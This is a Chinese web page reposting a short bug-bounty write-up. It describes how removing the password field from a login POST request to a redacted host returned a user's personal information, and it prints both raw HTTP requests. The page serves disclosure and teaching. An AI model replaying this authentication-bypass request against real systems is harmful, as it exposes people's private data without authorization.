记一次泄露PII的漏洞挖掘经历_集群智慧网络安全云
全国客户服务热线:4006-054-001 疑难解答:159-9855-7370(7X24受理投诉、建议、合作、售前咨询),173-0411-9111(售前),155-4267-2990(售前),座机/传真:0411-83767788(售后),微信咨询:543646
企业服务导航

记一次泄露PII的漏洞挖掘经历

发布日期:2024-05-19 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370


记一次泄露PII的漏洞挖掘经历

泄露PII的漏洞挖掘经历 什么是PII(Personal Identifiable Information) 个人可识别信息 这是有关一个人的数据,这些数据能帮助识别这个人,如姓名、指纹、电子邮件地址、电话号码等。 我使用提供的凭据进行测试,提交了我的用户名和密码并收到以下请求: POST /auth?subdomain=test&commonLoginQuery=true HTTP/1.1Host: redact.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/jsonContent-Length: 25Origin: redact.comReferer: redact.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: close {"login":"test@gmail.com, "password": "test1337"} 我从请求中删除了密码字段及其值,如下: POST /auth?subdomain=test&commonLoginQuery=true HTTP/1.1Host: redact.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/jsonContent-Length: 25Origin: redact.comReferer: redact.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: close {"login":"test@gmail.com"} 然后该用户的 PII 被泄露,并且显示了私人信息。 这是我收到的返回包: 有时,您需要尝试输入字段并处理一些意外行为。这就是为什么执行手动测试很重要,而不仅仅是依赖模糊测试,这可能会对网站造成损害。 文章来源:HACK学习呀 黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担! 如侵权请私聊我们删文 END

记一次泄露PII的漏洞挖掘经历